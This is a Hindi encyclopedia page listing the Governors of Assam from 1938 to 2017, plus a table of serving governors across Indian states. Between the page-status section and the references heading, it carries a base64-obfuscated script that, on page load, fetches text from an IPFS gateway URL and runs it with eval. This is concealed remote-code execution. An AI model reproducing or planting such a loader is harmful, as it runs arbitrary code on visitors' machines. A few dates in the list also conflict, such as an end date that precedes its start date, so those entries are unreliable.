असम के राज्यपाल

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
क्रमांक नाम छवि पदग्रहण पदमुक्ति
1. रॉबर्ट नील रीड 25 जून, 1938 24 जून 1938
2 गिल्बर्ट पिचिन हॉग 25 जून 1938 24 अक्टूबर 1938
3 रॉबर्ट नील रीड 25 अक्टूबर 1938 24 फ़रवरी 1939
4 हॅनरी जोसफ़ ट्वेनम 24 फ़रवरी 1939 4 अक्टूबर 1939
5 रॉबर्ट नील रीड 5 अक्टूबर 1939 3 मई 1942
6 ऍण्ड्रियू गॉर्ले क्लो 4 मई 1942 24 अप्रैल 1946
7 फ़्रैड्रिक चाल्मर्स बॉर्न 25 अप्रैल 1946 3 सितम्बर 1946
8 हॅनरी फ़ॉले नाइट 4 सितम्बर 1946 23 दिसम्बर 1946
9 ऍण्ड्रियू गॉर्ले क्लो 24 दिसम्बर 1946 3 मई 1947
1947 से असम के राज्यपाल
01. अकबर हयद्री 15 अगस्त, 1947 28 दिसम्बर, 1948
- रॉनल्ण्ड फ़्रान्सिस लॉज (कार्यवाहक) 30 दिसम्बर, 1948 15 फ़रवरी, 1949
02. श्रीप्रकाश
Sriprakash.jpg
16 फ़रवरी, 1949 27 मई, 1950
03. जयरामदास दौलतराम
Jairamdas-Daulatram.jpg
27 मई, 1950 14 मई, 1956
04. सैयद फ़ज़ल अली 15 मई, 1956 22 अगस्त, 1959
05. चन्द्रेश्वर प्रसाद सिन्हा 23 अगस्त, 1959 13 अक्टूबर, 1959
06. एस. एम. श्रीनागेश
S-M-Shrinagesh.jpg
14 अक्टूबर, 1959 12 नवम्बर, 1960
07. विष्णु सहाय 12 नवम्बर, 1960 12 फ़रवरी, 1961
08. एस. एम. श्रीनागेश
S-M-Shrinagesh.jpg
13 फ़रवरी, 1961 7 सितम्बर, 1962
09. विष्णु सहाय 7 सितम्बर, 1962 16 अप्रैल, 1968
10. ब्रज कुमार नेहरू
Braj-Kumar-Nehru.jpg
17 अप्रैल, 1968 7 दिसम्बर, 1970
- पी. के. गोस्वामी (कार्यवाहक) 8 दिसम्बर, 1970 4 जनवरी, 1971
(10.) ब्रज कुमार नेहरू
Braj-Kumar-Nehru.jpg
5 जनवरी, 1971 18 सितम्बर, 1973
11. लल्लन प्रसाद सिंह
Lallan-Prasad-Singh.png
19 सितम्बर, 1973 11 अगस्त, 1981
12. प्रकाश मेहरोत्रा 12 अगस्त, 1981 28 मार्च, 1984
13. टी. एस. मिश्रा 29 मार्च, 1984 15 अप्रैल, 1984
14. भीष्म नारायण सिंह
Bhishma-Narain-Singh.jpeg
16 अप्रैल, 1984 11 मई, 1989
15. हरी देव जोशी
Hari-Deo-Joshi.jpeg
12 मई, 1989 26 जुलाई, 1989
16. अनिसेत्ति रघुवीर 27 जुलाई, 1989 1 मई, 1990
17. देवीदास ठाकुर 2 मई, 1990 16 मार्च, 1991
18. लोकनाथ मिश्रा
Lokanath-Misra.jpg
17 मार्च, 1991 31 अगस्त, 1997
19. श्रीनिवास कुमार सिन्हा
S-K-Sinha.jpg
1 सितम्बर, 1997 4 जून, 2003
20. अरविन्द दवे
Arvind-Dave.jpg
21 अप्रॅल, 2003 5 जून, 2003
21. जनरल अजय सिंह
Lt-Gen-Ajai-Singh.jpg
5 जून, 2003 4 जुलाई, 2008
22. शिव चरण माथुर
Shiv-Charan-Mathur.png
4 जुलाई, 2008 25 जून, 2009
23. के. शंकरनारायणन
K-Sankaranarayanan.jpg
26 जून, 2009 26 जुलाई, 2009
24. सैयद सिब्ते रज़ी
Syed-Sibtey-Razi.jpg
27 जुलाई, 2009 10 दिसम्बर, 2009
25. जानकी बल्लभ पटनायक
Janaki-Ballabh-Patnaik.jpg
11 दिसम्बर, 2009 10 दिसम्बर, 2014
26. पद्मनाभ बालकृष्ण आचार्य
Padmanabha-Balakrishna-Acharya.jpg
12 दिसम्बर, 2014 17 अगस्त, 2016
27. बनवारीलाल पुरोहित
Banwarilal-Purohit.jpg
22 अगस्त, 2016 10 अक्टूबर, 2017
28. जगदीश मुखी
Jagdish-Mukhi.jpg
10 अक्टूबर, 2017 पदस्थ


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

भारतीय राज्यों में पदस्थ राज्यपाल, उपराज्यपाल एवं प्रशासक
क्रमांक राज्य राज्यपाल/उपराज्यपाल चित्र कार्यकाल प्रारम्भ
1. आंध्र प्रदेश विश्व भूषण हरिचंदन
Biswabhusan-Harichandan.jpg
24 जुलाई, 2019
2. अरुणाचल प्रदेश बी. डी. मिश्रा
B-D-Mishra.jpg
3 अक्टूबर, 2017
3. असम जगदीश मुखी
Jagdish-Mukhi.jpg
10 अक्टूबर, 2017
4. बिहार फागु चौहान
Phagu-Chauhan.jpg
29 जुलाई, 2019
5. छत्तीसगढ़ अनुसुइया उइके
Anusuiya-Uikey.jpg
29 जुलाई, 2019
6. गोवा पी. एस. श्रीधरन पिल्लई
P-S-Sreedharan-Pillai.jpg
7 जुलाई, 2021
7. गुजरात आचार्य देवव्रत
Acharya-Devvrat.jpg
22 जुलाई, 2019
8. हरियाणा बंडारू दत्तात्रेय
Bandaru-Dattatreya.jpg
7 जुलाई, 2021
9. हिमाचल प्रदेश राजेन्द्र आर्लेकर
Rajendra-Arlekar.jpg
13 जुलाई, 2021
10. झारखण्ड रमेश बैस
Ramesh-Bais.jpg
14 जुलाई, 2021
11. कर्नाटक थावर चंद गहलोत
Thawar-Chand-Gehlot.jpg
11 जुलाई, 2021
12. केरल आरिफ़ मोहम्मद ख़ान
Arif-Mohammad-Khan.jpg
6 सितम्बर, 2019
13. मध्य प्रदेश मंगूभाई छगनभाई पटेल
Mangubhai-Chhaganbhai-Patel.jpg
6 जुलाई, 2021
14. महाराष्ट्र भगत सिंह कोश्यारी
Bhagat-singh-koshyari.jpg
5 सितम्बर, 2019
15. मणिपुर एल. गणेशन
L-Ganesan.jpg
27 अगस्त, 2021
16. मेघालय सत्यपाल मलिक
Satya-Pal-Malik.jpg
19 अगस्त, 2020
17. मिज़ोरम कंभमपति हरिबाबू
Kambhampati-Haribabu.jpg
19 जुलाई, 2021
18. नागालैण्ड जगदीश मुखी
Jagdish-Mukhi.jpg
17 सितम्बर, 2021
19. ओडिशा गणेशी लाल
Ganeshi-Lal.jpg
29 मई, 2018
20. पंजाब बनवारीलाल पुरोहित
Banwarilal-Purohit.jpg
31 अगस्त, 2021
21. राजस्थान कलराज मिश्र
Kalraj-Mishra.png
9 सितम्बर, 2019
22. सिक्किम गंगा प्रसाद
Ganga-Prasad-Chaurasia.jpg
26 अगस्त, 2018
23. तमिल नाडु रविन्द्र नारायण रवि
Ravindra-Narayana-Ravi.jpg
18 सितम्बर, 2021
24. तेलंगाना तमिलसाई सुंदरराजन
Tamilisai-Soundararajan.jpg
8 सितम्बर, 2019
25. त्रिपुरा सत्यदेव नारायण आर्य
Satyadev-Narayan-Arya.jpg
7 जुलाई, 2021
26. उत्तर प्रदेश आनंदीबेन पटेल
Anandiben-Patel-1.jpg
29 जुलाई, 2019
27. उत्तराखण्ड गुरमीत सिंह
गुरमीत सिंह
15 सितंबर, 2021
28. पश्चिम बंगाल जगदीप धनखड़
Jagdeep-Dhankhar.jpg
30 जुलाई, 2019
29. अंडमान-निकोबार देवेन्द्र कुमार जोशी
Devendra-Kumar-Joshi.jpg
8 अक्टूबर, 2017
30, दिल्ली विनय कुमार सक्सैना
Vinai-Kumar-Saxena.jpg
26 मई, 2022
31. जम्मू-कश्मीर मनोज सिन्हा
Manoj-Sinha.jpg
7 अगस्त, 2020
32. लद्दाख राधाकृष्ण माथुर
Radha-Krishna-Mathur.jpg
31 अक्टूबर, 2019
33. पुदुच्चेरी के उपराज्यपाल तमिलसाई सुंदरराजन
Tamilisai-Soundararajan.jpg
18 फ़रवरी, 2021
34. चंडीगढ़ बनवारीलाल पुरोहित
Banwarilal-Purohit.jpg
31 अगस्त, 2021
35. दमन एवं दीव प्रफुल खोदा पटेल
Praful-Khoda-Patel.jpg
26 जनवरी, 2020
36. दादरा एवं नागर हवेली प्रफुल खोदा पटेल
Praful-Khoda-Patel.jpg
26 जनवरी, 2020
37. लक्षद्वीप प्रफुल खोदा पटेल (अतिरिक्त प्रभार)
Praful-Khoda-Patel.jpg
5 दिसम्बर, 2020